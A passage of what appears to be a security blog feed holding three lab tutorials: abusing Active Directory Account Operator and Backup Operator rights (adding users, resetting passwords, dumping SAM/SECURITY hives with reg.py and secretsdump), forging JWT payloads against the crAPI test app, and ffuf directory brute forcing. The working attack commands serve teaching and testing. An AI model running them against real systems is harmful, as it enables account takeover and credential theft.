Following our RDP access simulation, let&apos;s delve deeper into what a malicious user could achieve after gaining access as an Account Operator. This scenario will build on our previous lab setup and explore the potential actions and their implications.

#### Step 1: Identifying Members of &quot;Account Operators&quot;

Initially, we&apos;d need to identify who&apos;s in the &quot;Account Operators&quot; group. Let&apos;s use a PowerShell script for this purpose:

```powershell
# Define the group name to search for in Active Directory
$groupName = &quot;Account Operators&quot;

# Create an ADSI searcher object. This is a tool for querying Active Directory.
$searcher = [adsisearcher]&quot;(&amp;(objectCategory=group)(cn=$groupName))&quot;

# Execute the search and store the result. This will find the specific group.
$group = $searcher.FindOne()

# Check if the group was found. If the group exists, the script will proceed.
if ($group -ne $null) {
    # Extract the member property from the group, which contains the list of members.
    # The members are listed in the Distinguished Name (DN) format.
    $group.Properties.member
}
# If the group is not found, this part of the script will be skipped,
# preventing errors from attempting to access properties of a null object.


```

![](/content/images/2024/01/image-8.png)

Group identification

#### Step 2: Verifying a User&apos;s Membership

To check if our compromised user &apos;beruinsect&apos; is in this group, we run:

```powershell
net users beruinsect /domain

```

![](/content/images/2024/01/image-7.png)

Add user to domain

#### Step 3: Exploiting Account Operator Privileges

With &apos;beruinsect&apos; confirmed as an Account Operator, here are some actions they could perform:

```powershell
net user testingACOP Password123 /add /domain

```

**Creating a New User**: Establishing a foothold in the domain

![](/content/images/2024/01/image-9.png)

User created

**Changing Existing User Passwords**: Gaining access to other accounts.

```powershell
net user ironhammer Password1 /domain

```

![](/content/images/2024/01/image-19.png)

Change user password

**Local Domain Controller Login**: A potential avenue for further exploration.

![](/content/images/2024/01/image-10.png)

successful local access

If our user does not belong to this group, the following message would be displayed upon attempting to log in:

![](/content/images/2024/01/image-11.png)

Login attempt with a user who is not an account operator

## Exploring the Power of Backup Operators: A Path to Domain Admin

In our continuous exploration within the cybersecurity lab, we shift our focus to the intriguing &apos;Backup Operators&apos; group. Known for their ability to unlock domain admin rights, this group&apos;s distinct privileges can lead to substantial security breaches. To demonstrate this, we&apos;ll be using a specific tool: &apos;backup\_dc\_registry&apos;. This proof of concept (POC) on GitHub vividly illustrates how Backup Operator privileges can be exploited to remotely extract vital system files such as SAM, SYSTEM, and SECURITY, highlighting the potential for significant security exploits through practical application.

[GitHub - horizon3ai/backup\_dc\_registry: A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY](https://github.com/horizon3ai/backup_dc_registry/tree/main)

#### Step 1: Setting Up an SMB Server

Firstly, we need to establish an SMB server on our attacker machine. This server will act as a repository for files we&apos;ll acquire from the domain controller. Using Impacket, a versatile tool for network protocols, we set up the server with the following command:

```bash
impacket-smbserver smbfolder $(pwd) -smb2support

```

![](/content/images/2024/01/image-14.png)

Create a Samba Server

#### Step 2: Executing the Attack

With our SMB server ready, we now use a script to exploit the Backup Operator privileges. This script will allow us to access and retrieve the Security Account Manager (SAM) file from the domain controller, a critical step towards compromising the domain admin:

```bash
python3 reg.py beruinsect:&apos;Password1&apos;@192.168.20.151 backup -p &apos;\\192.168.1.108\smbfolder&apos;

```

![](/content/images/2024/01/image-13.png)

Execute the attack

#### Step 3: Dumping Credentials

After acquiring the necessary files, the next step involves extracting the credentials. This process is similar to what we covered in [Chapter 2](https://www.kayssel.com/post/active-directory-2-computers/):

```bash
impacket-secretsdump -system SYSTEM -security SECURITY -sam SAM local

```

![](/content/images/2024/01/image-15.png)

Dump credentials

## The Subtle Power of Event Log Readers: Uncovering Hidden Secrets

As we wrap up our journey through the different roles in Active Directory, we turn our attention to the often-underestimated group of Event Log Readers. This group, while not directly associated with overt privilege escalation methods, holds a different kind of power – the ability to uncover hidden information within system events that can lead to significant insights, including potential credentials.

#### Understanding Event Log Readers

Event Log Readers have the capability to access and read the system event logs. While this may seem innocuous at first glance, in large domains, these logs can be a goldmine of information, including inadvertent credential exposure. This is especially true when examining the trails left by PowerShell scripts, which might require higher privileges and inadvertently expose sensitive data in the process.

#### The Art of Event Log Analysis

Let&apos;s see how one can harness the power of this group to uncover potentially valuable information. Suppose you want to monitor events related to a specific user, &apos;beruinsect&apos;. The following PowerShell command can be used to filter and capture relevant log entries:

```powershell
wevtutil qe Security /rd:true /f:text | Select-String &quot;beruinsect&quot; &gt; logsberu

```

This command queries the Security logs, formats the output in text, and then filters for entries containing &apos;beruinsect&apos;, redirecting the output to a file for further analysis.

![](/content/images/2024/01/image-18.png)

Search for information on events

### The Importance of Log Scrutiny

This exercise with Event Log Readers emphasizes the less obvious, yet crucial, aspects of cybersecurity – vigilance in monitoring and analyzing logs. Even though Event Log Readers might not directly escalate privileges, the insights gleaned from logs can often lead to breakthroughs in understanding security vulnerabilities or uncovering inadvertent exposures.

# Conclusion: Harnessing Knowledge for Enhanced Security

As we conclude our in-depth exploration of the Active Directory roles of Account Operators, Backup Operators, and Event Log Readers, it&apos;s clear that each group, with its unique privileges and access, plays a critical role in the landscape of network security. From the active management capabilities of Account Operators to the crucial data access of Backup Operators, and the insightful oversight of Event Log Readers, these roles collectively form a tapestry of potential vulnerabilities and power within an AD environment.

#### Key Takeaways:

1.  **Understanding Leads to Strength**: By comprehensively understanding the functionalities and potential vulnerabilities of these roles, IT professionals and security enthusiasts can better fortify their defenses against potential exploits.
2.  **Power with Responsibility**: The exploration of these roles underscores the importance of responsible management. These privileges, while essential for network operation and maintenance, must be wielded with caution and oversight.
3.  **Vigilance is Crucial**: The subtleties of roles like Event Log Readers highlight that sometimes, the most powerful insights come from careful observation and analysis of seemingly mundane data.

#### Moving Forward:

As we navigate the complex world of cybersecurity, let this exploration serve as a reminder of the constant need for vigilance, ethical practice, and continuous learning. Whether it&apos;s through setting up controlled lab environments, practicing safe and legal testing methods, or keeping abreast of the latest in cybersecurity trends and threats, the journey towards robust network security is ongoing and ever-evolving.</content:encoded><author>Ruben Santos</author></item><item><title>Decoding JWT: Unveiling Vulnerabilities in API Security</title><link>https://www.kayssel.com/post/api-hacking-3</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-3</guid><description>Dive into JWTs in API hacking: Explore a key vulnerability, learn tools like jwt_tool and Burp Suite, and understand the &apos;what-ifs&apos; in security, like altering roles. For more, visit Burp Suite&apos;s site. Stay curious in cybersecurity!</description><pubDate>Sun, 14 Jan 2024 16:45:34 GMT</pubDate><content:encoded># **Introduction: Mastering JWTs in API Hacking**

Welcome back to our enthralling series where the art of API hacking takes center stage! Having journeyed through various methodologies in the previous chapter, we&apos;re now set to dive deeper into a specific, yet critical aspect of API security – the world of JSON Web Tokens (JWTs).

In the realm of API hacking, understanding JWTs is not just beneficial; it&apos;s essential. These tokens are the keystones of authentication and authorization in numerous web applications. This chapter will shed light on the inner workings of JWTs, unraveling how they function, why they&apos;re so pivotal in APIs, and most importantly, how they can become potential targets for hackers.

Our exploration won&apos;t stop at theory. We&apos;ll venture into the practical world, donning our hacker&apos;s hats to uncover and exploit JWT vulnerabilities. Armed with tools like jwt\_tool and Burp Suite, we&apos;ll demonstrate real-life hacking scenarios. You&apos;ll learn to identify weaknesses, test for vulnerabilities, and understand the attacker&apos;s perspective, which is crucial in fortifying your own APIs.

Get ready to immerse yourself in the intriguing world of JWTs within API hacking. Whether you&apos;re honing your hacking skills, seeking to fortify your APIs, or simply fascinated by the world of cybersecurity, this chapter promises to be a treasure trove of knowledge and hands-on learning.

# **Unlocking the Secrets of Authentication: A Journey into JWTs**

First up on our agenda is a deep dive into the login portal of our application**.** We&apos;re embarking on a journey to unravel how users are authenticated and then authorized to access various URLs. It&apos;s like being a digital detective, piecing together the intricate puzzle of online security.

Do you recall the user we created in the registration form from the previous chapter? It&apos;s time to don our detective hats and intercept their login request. This is where the digital magic unfolds – we&apos;re about to witness a token spring into action. Picture it as a backstage pass; the moment the user logs in, a token is issued, swinging open the doors to various parts of the application.

![upload in progress, 0](/content/images/2023/12/image-127.png)

Token returned by the application

Now, our focus shifts to the token we&apos;ve just uncovered**.** Consider it the master key, deftly managing access across the application&apos;s landscape. As we delve deeper, observing the requests within the application, we&apos;ll discover a consistent pattern: this token proudly parades in the headers of every request. It’s not just a key; it’s a VIP badge, dictating the realms accessible to our user.

![](/content/images/2024/01/image-5.png)

JWT in request headers

And this brings us to the epicenter of our digital quest – these tokens are known as JWTs, short for JSON Web Tokens**.** They are the unsung heroes in the world of web applications, playing a pivotal role in managing authentication and authorization, particularly in APIs. Think of them as the Swiss Army knife for digital access. In today&apos;s chapter, we&apos;re setting off to explore the enigmatic yet fascinating world of JWTs. We&apos;ll delve into their mechanics and understand their vital role in our application&apos;s ecosystem. Brace yourself for an intriguing exploration into the world of JWTs

# **Introduction to JSON Web Tokens (JWTs)**

Imagine you&apos;re at a carnival, and upon entering, you buy a ticket that grants you access to all the rides. This ticket is much like a JWT.

![](/content/images/2024/01/image.png)

JWT structure

A JWT is a compact, self-contained string used for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

Think of it as a secure package that contains important information (known as claims). These claims might include user identity, authorization data, or any other data you want to safely transfer.

When a user logs in to an application, the server creates a JWT with user-specific data and sends it back to the user. The user&apos;s device stores this JWT and includes it in the header of future requests to the server. This is like showing your ticket every time you want to get on a ride at the carnival.

![](/content/images/2023/12/image-116.png)

Payload of the JWT decoded with CyberChef

The server, upon receiving a request with a JWT, decodes and verifies it. If the token is valid, the server proceeds with the request, knowing it&apos;s authenticated and authorized.

In short, JWTs are like secure, digital tickets used in the online world to ensure that the data being exchanged is authentic and authorized. They&apos;re widely used for authentication and information exchange in web applications, making online interactions smoother and safer.

## **Understanding the Vulnerabilities of JSON Web Tokens (JWTs)**

However, like any system, JWTs come with their own set of vulnerabilities. Addressing these weaknesses is crucial to maintain the integrity and security of the applications relying on them. Let’s explore some of the main vulnerabilities associated with JWTs:

1.  **Insecure Secret Keys**: The strength of a JWT lies in its secret key, used for signing the token. If this key is weak or commonly known, attackers can easily decode and tamper with the token, compromising the security.
2.  **Algorithm Manipulation**: JWTs allow choosing the algorithm for signing. If an attacker changes the algorithm to a less secure one or &apos;none&apos;, it can lead to the system accepting a forged token.
3.  **Exposed Sensitive Information**: JWTs should not contain too much sensitive information, especially if not properly encrypted. Exposing such data can lead to privacy breaches and security risks.
4.  **Lack of Token Expiration**: Tokens without an expiration time can be risky, as they can be used indefinitely, potentially by unauthorized parties if they are intercepted.
5.  **Flawed Token Validation**: Proper validation of JWTs is essential. Without it, unauthorized users might gain access, much like someone slipping through a malfunctioning turnstile.
6.  **Signature Stripping**: In this attack, the signature part of the JWT is removed, leading to the acceptance of a potentially forged token if the system fails to verify its authenticity.
7.  **Header and Payload Manipulation**: Altering the information within a JWT can lead to unauthorized access or privilege escalation, similar to tampering with a ticket&apos;s details to gain unauthorized entry.

In essence, while JWTs are efficient and widely used for authentication and information exchange, understanding and mitigating their vulnerabilities is key to maintaining robust security in web applications. Just as safety measures in a carnival ensure a secure and enjoyable experience, addressing JWT vulnerabilities ensures a secure and trustworthy digital environment.

## **Main Tools for Analyzing JWT Security**

In our exploration of JWT security, we will be utilizing a range of tools, each offering unique capabilities for analyzing and mitigating vulnerabilities in JWT implementations. These tools provide a comprehensive approach to ensuring robust JWT security.

1.  **jwt\_tool**: This command-line utility excels in testing JWTs, allowing for the manipulation of tokens and the simulation of various attack scenarios.
2.  **Burp Suite**: An integrated platform for web security testing, Burp Suite offers features like traffic interception, automated scanning, and extensive analysis capabilities, including those for JWTs.
3.  **jwt.io**: An essential addition to our toolkit, jwt.io serves both as an educational resource and a practical tool for decoding, verifying, and generating JWTs. Its user-friendly interface makes it an excellent tool for quickly understanding and analyzing the structure and validity of JWTs.
4.  **JWTCrack**: Focused on cracking JWTs with weak secret keys, this tool is a testament to the importance of robust key management.
5.  **JWTSpy**: A Python-based tool for analyzing JWTs, JWTSpy identifies common vulnerabilities and misconfigurations, providing insights into potential security gaps.

### **Focusing on jwt\_tool, Burp Suite, and jwt.io for Today&apos;s Analysis**

For today&apos;s detailed analysis, we will be focusing on `jwt_tool`, Burp Suite, and jwt.io. This selection is strategic, allowing us to cover a wide range of testing and analysis scenarios:

-   **jwt\_tool** offers specialized functionalities for JWT testing, such as token manipulation and vulnerability testing.
-   **Burp Suite** provides a broad array of features for intercepting and analyzing web traffic, making it invaluable for examining JWTs within HTTP requests.
-   **jwt.io** will be utilized for its simplicity and effectiveness in decoding and encoding JWTs, which is crucial for understanding the structure and integrity of the tokens we are analyzing.

![](/content/images/2024/01/image-4.png)

Concatenatio of tools

Together, these tools form a comprehensive toolkit for our JWT security testing. We aim to use these tools to uncover any potential vulnerabilities and to ensure that the JWT implementations in our applications are secure, reliable, and resilient against various types of attacks.

# **The Adventure of Attacking JWTs**

Now that we&apos;ve armed ourselves with the essential knowledge to audit JWT tokens and familiarized ourselves with the most important tools, it&apos;s time to dive into the really exciting part – testing the security of the token! 😊

## Unraveling JWTs: The Art of Token Identification

The first step in our adventure is a bit like detective work: we need to do some reconnaissance to uncover what algorithm is used for the signature and what secrets the payload holds. For this task, jwt.io is our go-to tool – it&apos;s like having a magnifying glass that quickly reveals everything we need to know. Take a look at the image below to see jwt.io in action.

![](/content/images/2023/12/image-117.png)

jwt.io to decode the token

It&apos;s interesting to note that jwt\_tool can also be used for this purpose.

```bash
python3 jwt_tool.py eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyc2diZW5naUBnbWFpbC5jb20iLCJyb2xlIjoidXNlciIsImlhdCI6MTcwMzY5NTIwNywiZXhwIjoxNzA0MzAwMDA3fQ.AsLqfKslKe5_LRW7qan_C5WXO4vb11PAg4nVukyrLYH4cQKDDc5KrAx224VbddGiZMQI2DCEOYNmiQv55ryyie99jWHBVXXzDC-oUiNEegbswBIrAo1b5OM4t1C5ldbfyshdpkz4wqSQlIWi_CqH0F6r7BIe2DbwqI3EalY64pODNXWooEIjFVpwVwCUgY1fPPD8j_bcB39mXdBo8TBRi-jvVaQtzorXvRveL7FwskWcujLW4JudHzo4GofUoUJKaoPLv59dcjziPhOIRpXnnlArJxhH9AtXG5Ai75xBWPX5xffhYm4Ok6TK3o7wSPFVWXpZ0EP90In1qr8UAW3vzg

```

![](/content/images/2023/12/image-119.png)

When we examine the JWT.io output, we notice something intriguing: the JWT&apos;s signature is marked as invalid. This could be a critical clue, hinting that the token may not be generated properly. It opens up the possibility of modifying the jwt payload and still having it accepted by the application – a potential security loophole.

## **Embarking on a JWT Vulnerability Scanning Expedition**

With our preliminary reconnaissance through jwt.io wrapped up and the basic JWT information in hand, it&apos;s time to gear up for the next phase of our adventure: a vulnerability scan using jwt\_tool. Think of this as setting out on a treasure hunt, where the treasure is hidden vulnerabilities waiting to be discovered.

```bash
python3 jwt_tool.py -t http://192.168.20.120:8888/identity/api/v2/user/dashboard -rh &quot;Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyc2diZW5naUBnbWFpbC5jb20iLCJyb2xlIjoidXNlciIsImlhdCI6MTcwMzY5NTIwNywiZXhwIjoxNzA0MzAwMDA3fQ.AsLqfKslKe5_LRW7qan_C5WXO4vb11PAg4nVukyrLYH4cQKDDc5KrAx224VbddGiZMQI2DCEOYNmiQv55ryyie99jWHBVXXzDC-oUiNEegbswBIrAo1b5OM4t1C5ldbfyshdpkz4wqSQlIWi_CqH0F6r7BIe2DbwqI3EalY64pODNXWooEIjFVpwVwCUgY1fPPD8j_bcB39mXdBo8TBRi-jvVaQtzorXvRveL7FwskWcujLW4JudHzo4GofUoUJKaoPLv59dcjziPhOIRpXnnlArJxhH9AtXG5Ai75xBWPX5xffhYm4Ok6TK3o7wSPFVWXpZ0EP90In1qr8UAW3vzg&quot; -M pb| tee jwt_scan.txt

```

In this command, we&apos;re launching a probing expedition against various JWT vulnerabilities, seeking out any chinks in the armor that we might exploit to escalate privileges or access privileged information.

![](/content/images/2023/12/image-120.png)

As we analyze the scan results, imagine each green highlight as a marker of treasure – these are the vulnerabilities detected by our trusty tool. It&apos;s quite astonishing to see how many there are! Now, the real fun begins as we leverage these vulnerabilities. Let&apos;s dive in and see how we can turn these findings to our advantage, potentially uncovering paths to privileged access or sensitive information.

## **Unleashing Burp Suite for JWT Testing**

Let&apos;s up the ante in our JWT security exploration by bringing another player into the game – Burp Suite. But first, to make our tests even more effective, let&apos;s create another user in the application. It&apos;s like having an extra character in a video game, each with different abilities and access levels.

![](/content/images/2023/12/image-121.png)

Registration of another user

In the request we are working with, which is the main one that comes up when we enter the dashboard, we can see that if we do not alter anything, it shows us information about the user with which we have accessed

![](/content/images/2023/12/image-122.png)

Request without changing data

This is where Burp Suite steps in, acting like a digital scalpel. In the payload section of our token, we get the chance to tweak the data. What happens if we change the email to one that doesn&apos;t exist? It&apos;s like trying different keys in a lock until we find a mismatch. And indeed, the application responds by indicating the user doesn&apos;t exist. This is a telltale sign that the token signature might not be crafted or validated correctly.

![](/content/images/2023/12/image-123.png)

Alteration of payload data (select only the payload zone for burp to recognize it)

![](/content/images/2023/12/image-125.png)

Email does not exist

Now, let&apos;s turn the dial up. We aim to see if we can access information from another user just by knowing their email. With two users on the platform, we have the perfect setup for this test.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    Remember, in an API hacking audit, having at least two users – one with high privileges and one with lower ones – is crucial. It&apos;s like having two different lenses to view and understand the application&apos;s security landscape.
  &lt;/div&gt;
&lt;/div&gt;

So, let&apos;s make a switch in the email within the payload. And voilà! We find that we can indeed access information from another user – a door that, in theory, should have remained closed to us. This discovery not only highlights a critical security flaw but also underscores the power of tools like Burp Suite in unearthing these vulnerabilities.

![](/content/images/2023/12/image-126.png)

Listing another user&apos;s information

## **The Final Challenge: Attempting to Change Another User&apos;s Password**

Equipped with our newfound insights, let&apos;s push the boundaries a bit further. We suspect that other endpoints might also have vulnerabilities. What if we try something riskier, like changing another user&apos;s password? It&apos;s like testing the waters to see how deep the security flaws go.

![](/content/images/2023/12/image-132.png)

We start by capturing the request where we change the password for the user we&apos;re logged in with. It works like a charm; our password changes without a hitch. But now, let&apos;s spice things up. We tweak the payload, changing the email to that of another user. The goal? To see if we can reset their password. In this high-stakes game, we&apos;re using the Burp JSON Web Token plugin for the alteration, adding a new twist to our testing strategy.

![](/content/images/2023/12/image-133.png)

Password change request

![](/content/images/2023/12/image-134.png)

Invalid token detection

However, this endpoint seems to have a tighter security net. Despite our best efforts, it refuses to let us change another user&apos;s password. It’s a reminder that not all doors can be unlocked, even with the right set of tools.

We don&apos;t stop there. Running jwt\_tool against this endpoint reveals something interesting – no green tests this time, indicating that this endpoint is not vulnerable. It&apos;s like finding a well-secured treasure chest that refuses to budge.

![](/content/images/2023/12/image-131.png)

No vulnerability found

This experience underscores a crucial lesson: always test multiple endpoints. What fails on one might succeed on another. In the world of security testing, it&apos;s essential to cover all bases, leaving no stone unturned in our quest to ensure the application’s fortitude.

# **Fascinating Insight: The Storage and Impact of JWTs in Browsers**

Here&apos;s an intriguing piece of information that might seem straightforward but is often overlooked by those new to the field or with limited development experience. JWT tokens are commonly stored in a browser&apos;s local storage. This storage method is what makes them persistent and enables their inclusion in all API requests.

But there&apos;s more to it. What&apos;s particularly interesting to note is that developers sometimes leave part of the payload outside the JWT, perhaps in another cookie&apos;s value. And here&apos;s where it gets fascinating – altering this payload (often the role or permissions specified in the JWT) can change how the front-end appears. This means that tweaking these details could potentially reveal more of the application or expand the scope of endpoints accessible to us.

It&apos;s a subtle yet powerful aspect of JWTs that highlights the importance of thorough security considerations in both backend and frontend development. Understanding this can give us a better grasp of how applications function and, importantly, how they can be made more secure.

![](/content/images/2023/12/image-136.png)

JWT in local storage

# **Concluding Thoughts: A Journey Through the World of JWTs and Beyond**

As we draw the curtain on this insightful exploration into JWTs and their role in API hacking, it&apos;s important to reflect on the journey we&apos;ve taken. We delved into the intricate workings of JWTs, uncovering a particular vulnerability that revealed the nuanced challenges in securing APIs. However, this is just the tip of the iceberg. JWTs harbor a myriad of vulnerabilities, each requiring careful consideration and strategic defense mechanisms.

For those eager to dive deeper and uncover more about these vulnerabilities, I highly recommend visiting the Burp Suite website. It&apos;s a treasure trove of information, offering further insights and resources on the subject.

But perhaps the most crucial takeaway is the importance of asking &quot;what if&quot; questions. In our journey, we experimented by changing the email within a JWT, but what if we had altered the user&apos;s role to &apos;admin&apos;? Such questions are the bedrock of effective security testing and ethical hacking. They push us to think beyond the obvious, to explore every possible angle, and to anticipate the moves of potential attackers.

Remember, the world of cybersecurity is constantly evolving, and staying ahead means never ceasing to question, explore, and learn. This article is just a starting point – your journey into mastering API hacking and understanding the complexities of JWTs is an ongoing adventure.</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling API Hacking: A Methodological Journey Through Recognition and Exploration</title><link>https://www.kayssel.com/post/api-hacking-2-2</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-2-2</guid><description>Embark on the &quot;Hacking APIs&quot; journey—setting up a dynamic lab, applying OWASP methodologies, and conducting potent brute force tests on crAPI. Stay tuned for the next chapter, delving into precise login portal testing to fortify application security</description><pubDate>Sun, 07 Jan 2024 18:27:29 GMT</pubDate><content:encoded># Introduction

Welcome to a captivating journey into the realm of API hacking, where every line of code tells a story, and every vulnerability opens a door to vast unexplored territories. In this article, we&apos;ll plunge into the intriguing world of crAPI, an application that challenges our auditing skills in a unique way. But before we dive deep into the intricacies of this fascinating universe, let&apos;s ensure we have the right tools and our playground is set. Let&apos;s configure our lab and get ready for the exhilarating art of hacking APIs!

# Crafting the Ultimate Playground: Setting Up Your API Hacking Lab

Let&apos;s delve into the intriguing realm of API hacking by setting up the ultimate playground: the crAPI application. The installation process is a breeze; just ensure you have Docker or Docker-compose on your machine and follow the official crAPI documentation at OWASP/crAPI.

[crAPI/docs/setup.md at develop · OWASP/crAPI](https://github.com/OWASP/crAPI/blob/develop/docs/setup.md)

If you&apos;re sticking with the local setup, no worries; no adjustments are needed in the docker-compose.yml file. However, if you opt for a virtual machine setup (perhaps using Proxmox), a few tweaks are necessary. Navigate to the &quot;ports&quot; section and replace &quot;127.0.0.1&quot; with &quot;0.0.0.0&quot; to allow requests from all network interfaces. Check out the screenshots below for a sneak peek.

![](/content/images/2023/12/image-107.png)

Configuration of docker-compose.yml

![](/content/images/2024/01/image-23.png)

Change mailhog

With everything set up and the documentation at your fingertips, it&apos;s showtime. Deploy the environment with a magical command:

```bash
docker-compose -f docker-compose.yml --compatibility up -d

```

-   `**-f**`: Picture this as the script for our Docker orchestra. We specify the composition file (`docker-compose.yml`), outlining how our containers should interact and play together.
-   **`--compatibility`**: Think of this as the compatibility mode, ensuring smooth interactions between different versions of Docker. It&apos;s like having a universal translator for our containerized symphony.
-   **`up`**: This is the maestro&apos;s command, telling Docker to bring our composition to life! It orchestrates the deployment of our containers, creating a harmonious ensemble of interconnected services.
-   **`-d`**: Ah, the director&apos;s cut! This flag stands for detached mode, meaning our containers will perform their virtuoso acts in the background, allowing us to enjoy the show without being bombarded by logs.

In essence, with this command, we&apos;re telling Docker to follow our musical score (`docker-compose.yml`), ensuring compatibility among the performers, and then orchestrating a grand performance in the background. Bravo!

And just like that, you’re all set to explore the realm of API hacking!

# How to Hack like a Pro: Navigating the Auditing Maze with OWASP and More

Let&apos;s immerse ourselves in the world of auditing, but before we dive too deep, remember this crucial point—it&apos;s not a random game. We need some details upfront, and that&apos;s where the client comes in. They provide the scope (think target URL) and guide us on where to focus our hacking efforts (data filtering, injections, and the whole shebang).

Take our case, for instance. We&apos;re dealing with the crAPI application (yes, chuckle at the name if you must). We have the URL, and our mission is to conquer the world of API hacking.

To navigate this labyrinth, we need a sherpa, and that&apos;s where OWASP comes in. Picture them as the cool kids in cybersecurity, providing insights on testing and fortifying app security. Since our app dances with an API, we&apos;re eyeing the top 10 vulnerabilities OWASP has identified in these bad boys.

[OWASP API Security Project | OWASP Foundation](https://owasp.org/www-project-api-security/)

Here&apos;s the golden nugget of wisdom: before you unleash your testing ninja skills on any app, bow down to OWASP. Memorize it, tattoo it on your arm—whatever suits your style.

But wait, there&apos;s more! OWASP is like a treasure trove of hacking methodologies, tailored for every occasion you might encounter in your pentester life. Got a mobile app on your hands? They got you covered.

[OWASP MASTG - OWASP Mobile Application Security](https://mas.owasp.org/MASTG/)

And if OWASP leaves you craving more, or you need a quick fix, there’s always Hacktricks, the Swiss Army knife of hacking wisdom. It&apos;s got a bit of everything to tickle your fancy.

[HackTricks - HackTricks](https://book.hacktricks.xyz/welcome/readme)

Now, these methodologies can feel like a buffet where you want to try everything, but hold your horses. Incorporate them into your toolkit bit by bit, like adding spices to your secret sauce. My goal here is to hand you a simple yet solid API hacking starter pack. We’re talking basics—what to peek at when an app&apos;s got APIs. Once you&apos;re comfy with the basics and sidestep the usual traps, you can level up your game.

Remember, when you&apos;re starting out, you don’t have to be the Einstein of hacking. It’s a slow dance, a gradual journey. So, if an audit feels like you&apos;re juggling too much, relax. This realm is vast, and you’re in it for the long haul. Learn, adapt, and don’t let the overwhelm sneak in. You got this! 🚀

# **Mastering Application Audits: A Survival Guide**

Navigating an application audit requires a well-defined methodology to avoid drowning in complexity. I kick off the process by meticulously cataloging the application&apos;s functionalities, ensuring a comprehensive understanding. This systematic approach is universally applicable, whether the application is tailored for Android, iOS, or web platforms.

To document and fortify this exploration, I create a dedicated &apos;memory&apos;—a repository of steps and tests for future reference. This strategic documentation proves invaluable, enabling me to recall specific details effortlessly, even months later. Utilizing tools like Obsidian, I capture detailed notes and screenshots, facilitating comprehensive recall.

Armed with a holistic, high-level overview, I adopt a structured testing approach—from addressing the most critical aspects to the less critical ones. This prioritization aligns with the type of application under examination, following the esteemed OWASP guidelines. The meticulous testing strategy ensures a robust evaluation, contributing to the overall effectiveness of the audit process.

![](/content/images/2023/12/image-137.png)

Obsidian structure of a section

End-of-day rituals involve cross-referencing progress against a meticulously curated checklist. This step ensures that every crucial facet has been thoroughly examined, leaving no room for oversight. While generic templates are available on platforms like GitHub, I advocate for crafting a personalized checklist tailored to the unique nuances of the assessment at hand. This bespoke approach guarantees a more nuanced evaluation and aligns closely with the specific needs of the project.

It&apos;s crucial to acknowledge that this process is a dynamic and continuous learning journey. The pursuit of excellence involves the ongoing refinement of strategies, emphasizing the importance of gradual improvement over time. Embrace the ethos of perpetual learning, and the iterative evolution of your methodology will undoubtedly yield more robust and effective results.

[GitHub - arainho/awesome-api-security: A collection of awesome API Security tools and resources. The focus goes to open-source tools and resources that benefit all the community.](https://github.com/arainho/awesome-api-security)

# **Exploration Unveiled: Navigating the Digital Maze**

Embarking on our journey into application auditing, we plunge into the intriguing realm of crAPI testing. Our first port of call: the login interface. Here, we unleash the power of tools like ffuf or feroxbuster, conducting brute force tests to map directories and validate access without the need for credentials.

![](/content/images/2023/12/image-135.png)

Portal login

The unraveled information is meticulously logged into our &quot;memory bank&quot; for future reviews, marking only the commencement of our thorough assessment.

```bash
ffuf -u &quot;http://192.168.20.120:8888/FUZZ&quot; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 2835

```

-   **`-u`**: This is where we specify the target URL, with &quot;[http://192.168.20.120:8888/FUZZ](http://192.168.20.120:8888/FUZZ)&quot; acting as a placeholder for the word that will be tested in each iteration.
-   `**-w**`: Think of this as the word arsenal! It&apos;s where we define the list of words (in this case, `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`) that ffuf will use to launch its brute force attacks.
-   **`-fs`**: Here, we set a size limit to filter responses. At 2835 bytes, it means ffuf will only show responses that are 2835 bytes or larger.

These nifty options empower ffuf to flex its muscles, systematically trying out different words from the list and sifting through responses based on their size. It&apos;s like Sherlock Holmes combing through clues to uncover hidden paths or directories without the need for credentials. Quite the detective work, wouldn&apos;t you say?

![](/content/images/2023/12/image-138.png)

Ffuf results

## User registration and initial glipse

Post-directory exploration, the next stride involves user registration to unlock the application&apos;s functionalities.

![](/content/images/2023/12/image-108.png)

User registration

The payoff: distinct sections to explore, each revealing a facet of the digital landscape. A dashboard showcasing potential vehicle acquisitions, a store for procuring vehicle components, a community hub for user interactions, and a profile section encapsulating user characteristics.

## **Segmented Analysis**

This segmentation allows us to deconstruct the seemingly vast application into manageable components, enabling a more focused testing approach. The identified sections for detailed scrutiny include:

1.  **Login/Authentications Page**
2.  **Dashboard Information**
3.  **Component Purchase Area**
4.  **User Registration Area**
5.  **Community Area**
6.  **User Profile**

## **Structuring the Test Memory**

For effective documentation, our test memory aligns with these sections. As we delve into each area, pertinent details are recorded, encompassing functionality descriptions, operational processes, and thought-provoking questions. This meticulous documentation serves as a reference for the ongoing audit, ensuring a systematic and thorough examination of each facet.

By methodically covering these delineated areas, what initially appeared daunting is gradually deconstructed into comprehensible components, streamlining our testing process. The test memory becomes a dynamic repository, evolving with each audit iteration and fostering continuous improvement in our methodology.

![](/content/images/2023/12/image-139.png)

Structured memory

**Navigating Each Section:**

As we navigate through each of these sections, our approach involves capturing a detailed snapshot of the application&apos;s landscape. This entails not just assessing functionalities but also delving into the intricacies of operations, prompting thoughtful questions, and encapsulating the essence of our exploration.

**Functionality Descriptions:**

Each section is a canvas on which the application paints a unique picture. We meticulously document the functionalities, offering a vivid description that encapsulates the purpose and potential impact.

**Operational Insights:**

Our scrutiny extends beyond the surface, unraveling the nuances of how different operations unfold within each area. This includes a step-by-step analysis, shedding light on the mechanics behind the user experience.

**Thought-Provoking Questions:**

In the pursuit of a comprehensive evaluation, we pose questions that serve as signposts for deeper inquiry. These questions not only assess current functionality but also stimulate reflection on potential improvements or vulnerabilities.

**Continuous Iteration:**

